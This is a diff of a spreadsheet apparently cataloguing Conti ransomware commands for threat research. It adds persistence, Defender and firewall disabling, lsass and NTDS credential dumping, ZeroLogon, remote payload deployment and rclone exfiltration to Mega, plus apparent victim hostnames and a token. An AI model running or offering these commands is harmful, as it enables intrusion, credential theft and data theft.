--- a/delta2/lib_e/ransom.xlsx
+++ b/delta2/lib_e/ransom.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{6E41D4F5-65D0-EF41-96D9-82CABBFC0F64}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{05FCE543-4473-924C-A1BA-316B3BAED23B}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="-21100" windowWidth="38380" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
@@ -36,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1879" uniqueCount="965">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2307" uniqueCount="1249">
   <si>
     <t>eid</t>
   </si>
@@ -3129,6 +3129,937 @@
   </si>
   <si>
     <t>blackbyte-eid0097</t>
+  </si>
+  <si>
+    <t>shell whoami</t>
+  </si>
+  <si>
+    <t>{  "url": "https://github.com/DISREL/Conti-Leaked-Playbook-TTPs/blob/main/Conti-Leaked-Playbook-TTPs.pdf", "tags": ["conti"]}</t>
+  </si>
+  <si>
+    <t>shell SCHTASKS /s ip\hostname /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\P32.exe" /sc ONCE /sd 01/01/1970 /st 00:00</t>
+  </si>
+  <si>
+    <t>shell SCHTASKS /s ip\hostname /run /TN "WindowsSensor15"</t>
+  </si>
+  <si>
+    <t>shell schtasks /S ip\hostname /TN "WindowsSensor15" /DELETE /F</t>
+  </si>
+  <si>
+    <t>net user Admin Password1 /add</t>
+  </si>
+  <si>
+    <t>net localgroup Administrators Admin /add</t>
+  </si>
+  <si>
+    <t>net user oldadministrator "qc69t4B#Z0kE3" /add</t>
+  </si>
+  <si>
+    <t>net localgroup Administrators oldadministrator /ADD</t>
+  </si>
+  <si>
+    <t>reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f</t>
+  </si>
+  <si>
+    <t>gmer.exe</t>
+  </si>
+  <si>
+    <t>pchunter</t>
+  </si>
+  <si>
+    <t>PowerTool/64</t>
+  </si>
+  <si>
+    <t>delete DsMpEng.dll</t>
+  </si>
+  <si>
+    <t>"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f</t>
+  </si>
+  <si>
+    <t>Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" -Name PortNumber -Value 1350</t>
+  </si>
+  <si>
+    <t>NetSh Advfirewall set allprofiles state off</t>
+  </si>
+  <si>
+    <t>netsh advfirewall firewall set rule group="remote desktop" new enable=Yes</t>
+  </si>
+  <si>
+    <t>conti-eid0001</t>
+  </si>
+  <si>
+    <t>conti-eid0002</t>
+  </si>
+  <si>
+    <t>conti-eid0003</t>
+  </si>
+  <si>
+    <t>conti-eid0004</t>
+  </si>
+  <si>
+    <t>conti-eid0005</t>
+  </si>
+  <si>
+    <t>conti-eid0006</t>
+  </si>
+  <si>
+    <t>conti-eid0007</t>
+  </si>
+  <si>
+    <t>conti-eid0008</t>
+  </si>
+  <si>
+    <t>conti-eid0009</t>
+  </si>
+  <si>
+    <t>conti-eid0010</t>
+  </si>
+  <si>
+    <t>conti-eid0011</t>
+  </si>
+  <si>
+    <t>conti-eid0012</t>
+  </si>
+  <si>
+    <t>conti-eid0013</t>
+  </si>
+  <si>
+    <t>conti-eid0014</t>
+  </si>
+  <si>
+    <t>conti-eid0015</t>
+  </si>
+  <si>
+    <t>conti-eid0016</t>
+  </si>
+  <si>
+    <t>conti-eid0017</t>
+  </si>
+  <si>
+    <t>netsh firewall set service type =remotedesktop mode = enable</t>
+  </si>
+  <si>
+    <t>New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol TCP -Action allow</t>
+  </si>
+  <si>
+    <t>New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol UDP -Action allow</t>
+  </si>
+  <si>
+    <t>wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2&gt;&amp;1"</t>
+  </si>
+  <si>
+    <t>wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create"cmd /c copy \?
+\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ &amp; copy \?
+\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ &amp;copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log"</t>
+  </si>
+  <si>
+    <t>Esentutl /p C:\log\ntds.dit</t>
+  </si>
+  <si>
+    <t>wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ &amp; copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c\temp\log\ &amp; copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log"</t>
+  </si>
+  <si>
+    <t>rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full</t>
+  </si>
+  <si>
+    <t>wmic /node:[target] process call create "cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full"</t>
+  </si>
+  <si>
+    <t>remote-exec psexec [target] cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full (Cobalt Strike command)</t>
+  </si>
+  <si>
+    <t>Dump using GUI while TA is on RDP
+taskmgr
+Open taskmgr
+Go to process lsass
+“Create Dump File”</t>
+  </si>
+  <si>
+    <t>privilege::debug</t>
+  </si>
+  <si>
+    <t>sekurlsa::minidump A:\3.WORK\BL-ws20\lsass.DMP</t>
+  </si>
+  <si>
+    <t>sekurlsa::logonpasswords</t>
+  </si>
+  <si>
+    <t>powershell-import /tmp/Fast-Guide/Invoke-SMBAutoBrute.ps1</t>
+  </si>
+  <si>
+    <t>psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList "Password1, Welcome1, 1qazXDR% +" -LockoutThreshold 5</t>
+  </si>
+  <si>
+    <t>RouterScan.exe</t>
+  </si>
+  <si>
+    <t>netscan.exe /hide /auto:"result.xml" /config:netscan.xml /range:192.168.0.1-192.168.1.255</t>
+  </si>
+  <si>
+    <t>wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin list shadows &gt;&gt; c:\log.txt"</t>
+  </si>
+  <si>
+    <t>powershell Get-DomainController</t>
+  </si>
+  <si>
+    <t>powershell Get-DomainComputer -OperatingSystem *server* -Properties dnshostname</t>
+  </si>
+  <si>
+    <t>powershell get-adcomputer -filter * | select -expand name</t>
+  </si>
+  <si>
+    <t>nltest /dclist:"NameDomain"</t>
+  </si>
+  <si>
+    <t>conti-eid0018</t>
+  </si>
+  <si>
+    <t>conti-eid0019</t>
+  </si>
+  <si>
+    <t>conti-eid0020</t>
+  </si>
+  <si>
+    <t>conti-eid0021</t>
+  </si>
+  <si>
+    <t>conti-eid0022</t>
+  </si>
+  <si>
+    <t>conti-eid0023</t>
+  </si>
+  <si>
+    <t>conti-eid0024</t>
+  </si>
+  <si>
+    <t>conti-eid0025</t>
+  </si>
+  <si>
+    <t>conti-eid0026</t>
+  </si>
+  <si>
+    <t>conti-eid0027</t>
+  </si>
+  <si>
+    <t>conti-eid0028</t>
+  </si>
+  <si>
+    <t>conti-eid0029</t>
+  </si>
+  <si>
+    <t>conti-eid0030</t>
+  </si>
+  <si>
+    <t>conti-eid0031</t>
+  </si>
+  <si>
+    <t>conti-eid0032</t>
+  </si>
+  <si>
+    <t>conti-eid0033</t>
+  </si>
+  <si>
+    <t>conti-eid0034</t>
+  </si>
+  <si>
+    <t>conti-eid0035</t>
+  </si>
+  <si>
+    <t>conti-eid0036</t>
+  </si>
+  <si>
+    <t>conti-eid0037</t>
+  </si>
+  <si>
+    <t>conti-eid0038</t>
+  </si>
+  <si>
+    <t>conti-eid0039</t>
+  </si>
+  <si>
+    <t>conti-eid0040</t>
+  </si>
+  <si>
+    <t>conti-eid0041</t>
+  </si>
+  <si>
+    <t>net group "Domain Admins" /domain</t>
+  </si>
+  <si>
+    <t>net group "Enterprise Admins" /domain</t>
+  </si>
+  <si>
+    <t>powershell Get-NetSubnet</t>
+  </si>
+  <si>
+    <t>nltest /domain_trusts /all_trusts</t>
+  </si>
+  <si>
+    <t>7za.exe a -tzip -mx5 \DC01\C$\temp\log.zip\DC01\C$\temp\log -pTOPSECRETPASSWORD</t>
+  </si>
+  <si>
+    <t>{
+mkdir "C:\ProgramData\AnyDesk"
+# Download AnyDesk
+$clnt = new-object System.Net.WebClient
+$url = "http://download.anydesk.com/AnyDesk.exe"
+$file = "C:\ProgramData\AnyDesk.exe"
+$clnt.DownloadFile($url,$file)cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silentcmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password
+net user oldadministrator "qc69t4B#Z0kE3"/add
+net localgroup Administrators oldadministrator /ADD
+reg add"HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f
+cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
+}</t>
+  </si>
+  <si>
+    <t>rclone.exe copy "\envisionpharma.com\IT\KLSHARE" Mega:Finanse -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12</t>
+  </si>
+  <si>
+    <t>rclone.exe copy "\PETERLENOVO.wist.local\Users" ftp1:uploads/Users/ -q --ignore-existing --auto-confirm --multi-thread-streams 3 --transfers 3</t>
+  </si>
+  <si>
+    <t>#!/bin/bash
+OUTPATH="sorted"
+F1INPATH="ad_computers.txt"
+F2INPATH="ad_users.txt"
+F2OUTPATH="ad_users_result.txt"
+mkdir "$OUTPATH"
+while read p; do
+if [[ ${p:0:17} == "&gt;operatingSystem:" ]];
+then
+OSPATH=${p:18}
+fi
+if [[ ${p:0:13} == "&gt;dNSHostName:" ]]; then
+if [[ ${OSPATH:0:14} == "Windows Server"
+]]; then
+echo ${p:14} &gt;&gt; "$OUTPATH/SERVERS.txt"
+tmp=$(echo "$OSPATH" | cut -d' ' -f1-3)
+echo ${p:14} &gt;&gt; "$OUTPATH/$tmp.txt"
+else
+echo ${p:14} &gt;&gt; "$OUTPATH/WORKERS.txt"
+tmp=$(echo "$OSPATH" | cut -d' ' -f1-2)
+echo ${p:14} &gt;&gt; "$OUTPATH/$tmp.txt"
+fi
+fi
+done &lt; $F1INPATH
+while read p; do
+if [[ ${p:0:13} == "&gt;description:" ]]; then
+DECR=${p:14}
+DECR=${DECR%$'\r'}
+fi
+if [[ ${p:0:16} == "&gt;sAMAccountName:" ]];
+then
+ACCNAME=${p:17}
+ACCNAME=${ACCNAME%$'\r'}
+echo "$ACCNAME:$DECR" &gt;&gt; "$OUTPATH
+/$F2OUTPATH"
+fi
+done &lt; $F2INPATH</t>
+  </si>
+  <si>
+    <t xml:space="preserve">Use of Cobalt Strike SHELL to execute variety of commands while exploitation. </t>
+  </si>
+  <si>
+    <t>shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass"process call create "cmd /c vssadmin list shadows &gt;&gt; c:\log.txt"</t>
+  </si>
+  <si>
+    <t>shell wmic /node:10.28.0.3 process call create "C:\ProgramData\j1.exe"</t>
+  </si>
+  <si>
+    <t>shell wmic /node:172.16.0.36 process call create "rundll32.exe C:\ProgramData\p64.dll StartW"</t>
+  </si>
+  <si>
+    <t>remote-exec wmi FMH-DC01 rundll32.exe C:\ProgramData\tlt.dll StartW</t>
+  </si>
+  <si>
+    <t>shell wmic /node:"PC NAME" process call create "COMMAND TO BE EXECUTED"</t>
+  </si>
+  <si>
+    <t>adfind.exe -f "(objectcategory=person)" &gt; ad_users.txt</t>
+  </si>
+  <si>
+    <t>adfind.exe -f "(objectcategory=organizationalUnit)" &gt; ad_ous.txt</t>
+  </si>
+  <si>
+    <t>adfind.exe -gcb -sc trustdmp &gt; trustdmp.txt</t>
+  </si>
+  <si>
+    <t>adfind.exe -f "(objectcategory=group)" &gt; ad_group.txt</t>
+  </si>
+  <si>
+    <t>adfind.exe -f objectcategory = computer -csv name cn OperatingSystem dNSHostName&gt; some.csv</t>
+  </si>
+  <si>
+    <t>adfind.exe -f "objectcategory=computer" &gt; ad_computers.txt</t>
+  </si>
+  <si>
+    <t>adfind.exe -subnets -f (objectCategory=subnet)&gt; subnets.txt</t>
+  </si>
+  <si>
+    <t>psinject 4728 x86 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encoding UTF8 (Cobalt Strike command)</t>
+  </si>
+  <si>
+    <t>PowerView.ps1</t>
+  </si>
+  <si>
+    <t>psinject 1884 x64 Invoke-UserHunter -Threads 20 -UserFile C:\ProgramData\list.txt &gt;&gt; C:\ProgramData\out.txt</t>
+  </si>
+  <si>
+    <t>Invoke-UserHunter</t>
+  </si>
+  <si>
+    <t>Invoke-ShareFinder</t>
+  </si>
+  <si>
+    <t>psinject 7080 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt (Cobalt Strike command)</t>
+  </si>
+  <si>
+    <t>ngrok authtoken1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg</t>
+  </si>
+  <si>
+    <t>ngrok tcp 3389</t>
+  </si>
+  <si>
+    <t>start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\PRIMARY DOMAIN CONTROLLER\share$\fx166.exe" "C:\windows\temp"</t>
+  </si>
+  <si>
+    <t>PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe</t>
+  </si>
+  <si>
+    <t>curl -o setup.msi "http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1&amp;integratorLogin=REDACTED%40protonmail.com" &amp;&amp; msiexec /i setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1</t>
+  </si>
+  <si>
+    <t>shell setup_undefined.msi</t>
+  </si>
+  <si>
+    <t xml:space="preserve">MSBuild Install Atera Agent </t>
+  </si>
+  <si>
+    <t>conti-eid0042</t>
+  </si>
+  <si>
+    <t>conti-eid0043</t>
+  </si>
+  <si>
+    <t>conti-eid0044</t>
+  </si>
+  <si>
+    <t>conti-eid0045</t>
+  </si>
+  <si>
+    <t>conti-eid0046</t>
+  </si>
+  <si>
+    <t>conti-eid0047</t>
+  </si>
+  <si>
+    <t>conti-eid0048</t>
+  </si>
+  <si>
+    <t>conti-eid0049</t>
+  </si>
+  <si>
+    <t>conti-eid0050</t>
+  </si>
+  <si>
+    <t>conti-eid0051</t>
+  </si>
+  <si>
+    <t>conti-eid0052</t>
+  </si>
+  <si>
+    <t>conti-eid0053</t>
+  </si>
+  <si>
+    <t>conti-eid0054</t>
+  </si>
+  <si>
+    <t>conti-eid0055</t>
+  </si>
+  <si>
+    <t>conti-eid0056</t>
+  </si>
+  <si>
+    <t>conti-eid0057</t>
+  </si>
+  <si>
+    <t>conti-eid0058</t>
+  </si>
+  <si>
+    <t>conti-eid0059</t>
+  </si>
+  <si>
+    <t>conti-eid0060</t>
+  </si>
+  <si>
+    <t>conti-eid0061</t>
+  </si>
+  <si>
+    <t>conti-eid0062</t>
+  </si>
+  <si>
+    <t>conti-eid0063</t>
+  </si>
+  <si>
+    <t>conti-eid0064</t>
+  </si>
+  <si>
+    <t>conti-eid0065</t>
+  </si>
+  <si>
+    <t>conti-eid0066</t>
+  </si>
+  <si>
+    <t>conti-eid0067</t>
+  </si>
+  <si>
+    <t>conti-eid0068</t>
+  </si>
+  <si>
+    <t>conti-eid0069</t>
+  </si>
+  <si>
+    <t>conti-eid0070</t>
+  </si>
+  <si>
+    <t>conti-eid0071</t>
+  </si>
+  <si>
+    <t>conti-eid0072</t>
+  </si>
+  <si>
+    <t>conti-eid0073</t>
+  </si>
+  <si>
+    <t>conti-eid0074</t>
+  </si>
+  <si>
+    <t>conti-eid0075</t>
+  </si>
+  <si>
+    <t>conti-eid0076</t>
+  </si>
+  <si>
+    <t>net domain_controllers</t>
+  </si>
+  <si>
+    <t>shell net localgroup administrators</t>
+  </si>
+  <si>
+    <t>shell whoami /groups</t>
+  </si>
+  <si>
+    <t>shell net group "Enterprise Admins" /domain</t>
+  </si>
+  <si>
+    <t>shell net group "Domain Computers" /domain</t>
+  </si>
+  <si>
+    <t>net computers</t>
+  </si>
+  <si>
+    <t>powershell-import /home/user/work/ShareFinder.ps1</t>
+  </si>
+  <si>
+    <t>psinject 1234 x64 Invoke-ShareFinder -CheckAdmin -Verbose | Out- File -Encoding ascii C:\ProgramData\sh.txt</t>
+  </si>
+  <si>
+    <t>psinject 5209 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shda.txt</t>
+  </si>
+  <si>
+    <t>powershell-import /home/user/work/Invoke-Kerberoast.ps1</t>
+  </si>
+  <si>
+    <t>psinject 4728 x64 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force - Encoding UTF8</t>
+  </si>
+  <si>
+    <t>execute-assembly /home/user/work/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt</t>
+  </si>
+  <si>
+    <t>execute-assembly /home/user/work/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt</t>
+  </si>
+  <si>
+    <t>log nameoflog.log</t>
+  </si>
+  <si>
+    <t>privilege::debug – checking privileges
+log nameoflog.log – enable log
+sekurlsa::logonpasswords – show all stored local passwords in plaintext
+log
+privilege::debug
+sekurlsa::logonpasswords
+token::elevate
+lsadump::sam</t>
+  </si>
+  <si>
+    <t>mimikatz commands</t>
+  </si>
+  <si>
+    <t>lsadump::dcsync /user:Administrator</t>
+  </si>
+  <si>
+    <t>sekurlsa::pth /user: /domain: /ntlm: /run:cmd</t>
+  </si>
+  <si>
+    <t>getsystem
+hashdump
+logonpasswords</t>
+  </si>
+  <si>
+    <t>mimikatz in cobalt strike</t>
+  </si>
+  <si>
+    <t>beacon&gt; make_token domen\user password – impersonate user token
+beacon&gt; pth domen\user NTLM - impersonate user token
+beacon&gt; rev2self – revert session to default
+beacon&gt; dcsync domain.com (Replace domain.com - with domain) - acquire all hashes from
+domain (domain administrator token is required)</t>
+  </si>
+  <si>
+    <t>cobalt strike beacon</t>
+  </si>
+  <si>
+    <t>pth Domain\Admin pass (as hash) shell dir \\ip or hostname\c$ EliAdmin:1001:aad3b435b51404eeaad3b435b51404ee:b0059c57f5249ede3db768e388ee0b14:::
+pth ELC\EliAdmin b0059c57f5249ede3db768e388ee0b14</t>
+  </si>
+  <si>
+    <t>make_token Domain\Admin Pass rev2self</t>
+  </si>
+  <si>
+    <t>procdump.exe -acceptula -ma lsass.exe C:\compaq\lsass.dmp procdump64.exe -acceptula -ma lsass.exe C:\compaq\lsass.dmp</t>
+  </si>
+  <si>
+    <t>mimikatz lsadump::zerologon /target:[controller.domain.local] /account:[controller]$/exploit</t>
+  </si>
+  <si>
+    <t>mimikatz lsadump::zerologon /target:DC01.contoso.com /account:DC01$ /exploit</t>
+  </si>
+  <si>
+    <t>shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full</t>
+  </si>
+  <si>
+    <t>shell wmic /node:[target] process call create "cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID</t>
+  </si>
+  <si>
+    <t>C:\ProgramData\lsass.dmp full" remote-exec psexec [target] cmd /c rundll32.exe</t>
+  </si>
+  <si>
+    <t>powershell-import /tmp/Fast-Guide/Invoke-SMBAutoBrute.ps1 psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList "Password1,</t>
+  </si>
+  <si>
+    <t>powershell Invoke-Nightmare -NewUser "HACKER" -NewPassword "FUCKER" -DriverName "Xeroxxx"</t>
+  </si>
+  <si>
+    <t>{"url": "https://talosintelligence.com/resources/269", "tags": ["conti"]}</t>
+  </si>
+  <si>
+    <t>powershell-import //import file CVE-2021-34527.ps1</t>
+  </si>
+  <si>
+    <t>net user OldAdmin 1Q2w3E4r5T6y /add</t>
+  </si>
+  <si>
+    <t>net localgroup Administrators OldAdmin /ADD</t>
+  </si>
+  <si>
+    <t>https://github.com/rsmudge/ZeroLogon-BOF</t>
+  </si>
+  <si>
+    <t>dcsync domain.local</t>
+  </si>
+  <si>
+    <t>shell AGENT_INSTALLER.msi</t>
+  </si>
+  <si>
+    <t>shell nltest /domain_trusts /all_trusts</t>
+  </si>
+  <si>
+    <t>shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin list shadows &gt;&gt; c:\log.txt"</t>
+  </si>
+  <si>
+    <t>net start Volume Shadow Copy</t>
+  </si>
+  <si>
+    <t>shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2&gt;&amp;1"</t>
+  </si>
+  <si>
+    <t>shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NT DS.dit c:\temp\log\ &amp; copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ &amp; copy\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log\"</t>
+  </si>
+  <si>
+    <t>C:\programdata\netscan</t>
+  </si>
+  <si>
+    <t>shell netscan.exe /hide /auto:"resuult.xml" /config:netscan.xml /file:range.txt</t>
+  </si>
+  <si>
+    <t>beacon&gt; shell net group "domain admins" /domain</t>
+  </si>
+  <si>
+    <t>beacon&gt; shell net user ebernardo /domain</t>
+  </si>
+  <si>
+    <t>linux</t>
+  </si>
+  <si>
+    <t>execute-assembly /home/user/soft/scripts/SharpView.exe Find- DomainUserLocation -UserIdentity gpetit</t>
+  </si>
+  <si>
+    <t>execute-assembly C:\Users\Андрей\Soft\Hacking\SharpView.exe Find-DomainUserLocation -UserIdentity gpetit</t>
+  </si>
+  <si>
+    <t>shell net view \\172.16.1.40 /ALL</t>
+  </si>
+  <si>
+    <t>shell dir \\172.16.1.40\c$</t>
+  </si>
+  <si>
+    <t>\\172.16.1.40\c$\Users\gpetit\AppData\Local\Filezilla
+\\172.16.1.40\c$\Users\gpetit\AppData\Roaming\Filezilla</t>
+  </si>
+  <si>
+    <t>shell rclone.exe copy "шара" Mega:training -q --ignore-existing --auto-confirm --multi-thread-streams 1 --transfers 3 --bwlimit 5M</t>
+  </si>
+  <si>
+    <t>shell rclone.exe copy "\\WTFINANCE.washoetribe.net\E$\FINANCE" mega:1 -q --ignore-existing --auto-confirm --multi-thread-streams 1 --transfers 3 --bwlimit 5M</t>
+  </si>
+  <si>
+    <t>shell rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12</t>
+  </si>
+  <si>
+    <t>shell rclone.exe copy "\\PETERLENOVO.wist.local\Users" ftp1:uploads/Users/ -q --ignore-existing --auto-confirm --multi-thread-streams 3 --transfers 3</t>
+  </si>
+  <si>
+    <t>shell rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread- streams 12 --transfers 12</t>
+  </si>
+  <si>
+    <t xml:space="preserve">https://mega.io/sync </t>
+  </si>
+  <si>
+    <t>cyber
+policy
+insurance
+endorsement
+supplementary
+underwriting
+terms
+bank
+2020
+2021
+Statement</t>
+  </si>
+  <si>
+    <t>conti keyword search</t>
+  </si>
+  <si>
+    <t>start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\\PRIMARY DOMAIN CONTROLLER\share$\fx166.exe" "C:\windows\temp\"</t>
+  </si>
+  <si>
+    <t>start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe</t>
+  </si>
+  <si>
+    <t>start wmic /node:@C:\share$\comps1.txt /user:"DOMAIN\Administrator" /password:"PASSWORD" process call create "cmd.exe /c bitsadmin /transfer fx166\\DOMAIN CONTROLLER share$\fx166.exe %APPDATA%\fx166.exe&amp;%APPDATA%\fx166.exe"</t>
+  </si>
+  <si>
+    <t>gpedit.msc Select "Disable real-time protection" and change it to "Enabled"</t>
+  </si>
+  <si>
+    <t>New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name
+DisableAntiSpyware -Value 1 -PropertyType DWORD - Force</t>
+  </si>
+  <si>
+    <t>conti-eid0077</t>
+  </si>
+  <si>
+    <t>conti-eid0078</t>
+  </si>
+  <si>
+    <t>conti-eid0079</t>
+  </si>
+  <si>
+    <t>conti-eid0080</t>
+  </si>
+  <si>
+    <t>conti-eid0081</t>
+  </si>
+  <si>
+    <t>conti-eid0082</t>
+  </si>
+  <si>
+    <t>conti-eid0083</t>
+  </si>
+  <si>
+    <t>conti-eid0084</t>
+  </si>
+  <si>
+    <t>conti-eid0085</t>
+  </si>
+  <si>
+    <t>conti-eid0086</t>
+  </si>
+  <si>
+    <t>conti-eid0087</t>
+  </si>
+  <si>
+    <t>conti-eid0088</t>
+  </si>
+  <si>
+    <t>conti-eid0089</t>
+  </si>
+  <si>
+    <t>conti-eid0090</t>
+  </si>
+  <si>
+    <t>conti-eid0091</t>
+  </si>
+  <si>
+    <t>conti-eid0092</t>
+  </si>
+  <si>
+    <t>conti-eid0093</t>
+  </si>
+  <si>
+    <t>conti-eid0094</t>
+  </si>
+  <si>
+    <t>conti-eid0095</t>
+  </si>
+  <si>
+    <t>conti-eid0096</t>
+  </si>
+  <si>
+    <t>conti-eid0097</t>
+  </si>
+  <si>
+    <t>conti-eid0098</t>
+  </si>
+  <si>
+    <t>conti-eid0099</t>
+  </si>
+  <si>
+    <t>conti-eid0100</t>
+  </si>
+  <si>
+    <t>conti-eid0101</t>
+  </si>
+  <si>
+    <t>conti-eid0102</t>
+  </si>
+  <si>
+    <t>conti-eid0103</t>
+  </si>
+  <si>
+    <t>conti-eid0104</t>
+  </si>
+  <si>
+    <t>conti-eid0105</t>
+  </si>
+  <si>
+    <t>conti-eid0106</t>
+  </si>
+  <si>
+    <t>conti-eid0107</t>
+  </si>
+  <si>
+    <t>conti-eid0108</t>
+  </si>
+  <si>
+    <t>conti-eid0109</t>
+  </si>
+  <si>
+    <t>conti-eid0110</t>
+  </si>
+  <si>
+    <t>conti-eid0111</t>
+  </si>
+  <si>
+    <t>conti-eid0112</t>
+  </si>
+  <si>
+    <t>conti-eid0113</t>
+  </si>
+  <si>
+    <t>conti-eid0114</t>
+  </si>
+  <si>
+    <t>conti-eid0115</t>
+  </si>
+  <si>
+    <t>conti-eid0116</t>
+  </si>
+  <si>
+    <t>conti-eid0117</t>
+  </si>
+  <si>
+    <t>conti-eid0118</t>
+  </si>
+  <si>
+    <t>conti-eid0119</t>
+  </si>
+  <si>
+    <t>conti-eid0120</t>
+  </si>
+  <si>
+    <t>conti-eid0121</t>
+  </si>
+  <si>
+    <t>conti-eid0122</t>
+  </si>
+  <si>
+    <t>conti-eid0123</t>
+  </si>
+  <si>
+    <t>conti-eid0124</t>
+  </si>
+  <si>
+    <t>conti-eid0125</t>
+  </si>
+  <si>
+    <t>conti-eid0126</t>
+  </si>
+  <si>
+    <t>conti-eid0127</t>
+  </si>
+  <si>
+    <t>conti-eid0128</t>
+  </si>
+  <si>
+    <t>conti-eid0129</t>
+  </si>
+  <si>
+    <t>conti-eid0130</t>
+  </si>
+  <si>
+    <t>conti-eid0131</t>
+  </si>
+  <si>
+    <t>conti-eid0132</t>
+  </si>
+  <si>
+    <t>conti-eid0133</t>
+  </si>
+  <si>
+    <t>conti-eid0134</t>
+  </si>
+  <si>
+    <t>conti-eid0135</t>
+  </si>
+  <si>
+    <t>conti-eid0136</t>
+  </si>
+  <si>
+    <t>conti-eid0137</t>
+  </si>
+  <si>
